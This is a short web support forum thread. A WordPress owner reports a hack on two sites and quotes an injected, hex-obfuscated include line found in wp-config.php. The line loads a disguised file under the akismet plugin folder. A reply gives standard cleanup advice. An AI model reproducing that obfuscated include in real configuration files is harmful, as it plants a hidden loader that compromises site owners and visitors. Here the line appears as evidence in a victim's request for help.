Hi Bill I have been hacked- can you advise on

Support Area Forums Elite Hi Bill I have been hacked- can you advise on

Viewing 2 posts - 1 through 2 (of 2 total)
URL to the page in question: http://
  • Author

Its first of all the usual,,
    ERROR: Cookies are blocked due to unexpected output. For help, please see this documentation or try the support forums.
    When trying to login

SO, eventually got
    Warning: include(/var/chroot/home/content/21/9377921/html/66CITIES/wp-content/plugins/akismet/include.php) [function.include]: failed to open stream: No such file or directory in/home/content/21/9377921/html/66CITIES/wp-config.php on line 67

Warning: include() [function.include]: Failed opening ‘/var/chroot/home/content/21/9377921/html/66CITIES/wp-content/plugins/akismet/include.php’ for inclusion (include_path=’.:/usr/local/php5_3/lib/php’) in/home/content/21/9377921/html/66CITIES/wp-config.php on line 67

Warning: Cannot modify header information – headers already sent by (output started at /home/content/21/9377921/html/66CITIES/wp-config.php:67) in /home/content/21/9377921/html/66CITIES/wp-includes/pluggable.php on line 1207

Therefore…. I looked
    THIS WAS IN wp-CONFIG.PHP LINE 67

* Change this to true to en*/”\x2fvar\x2fchr\x6fot/\x68ome\x2fcon\x74ent\x2f21/\x39377\x3921/\x68tml\x2f66C\x49TIE\x53/wp\x2dcon\x74ent\x2fplu\x67ins\x2faki\x73met\x2finc\x6cude\x2ephp”;/*able the display of notices during development.

This is what it should be

* Change this to true to enable the display of notices during development.
    * It is strongly recommended that plugin and theme developers use WP_DEBUG
    * in their development environments.

O I removed the code and then came up with

Warning: include(1) [function.include]: failed to open stream: No such file or directory in /home/content/21/9377921/html/66CITIES/wp-config.php on line 71

Warning: include() [function.include]: Failed opening ‘1’ for inclusion

I am thinking of ditchng the site!

Actually, I am experiencing this on 2 sites…

any ideas mate

Bill Robbins

Getting hacked is no fun. If you have a backup before it happened, I would delete the entire WorsdPress installation and restore the backup. Then make sure everything is updated. Next I would change my username and passwords n all infected sites. Make sure to use unique and strong passwords. It would also be good to change the database passwords as well since they have possibly been compromised.

If you don’t have a backup, you may need the help of s security company like sucuri.net to help you clean out the infection. It’s not inexpensive, but it does work.

Let me know how it goes,
    Bill

Viewing 2 posts - 1 through 2 (of 2 total)
  • The topic ‘Hi Bill I have been hacked- can you advise on’ is closed to new replies.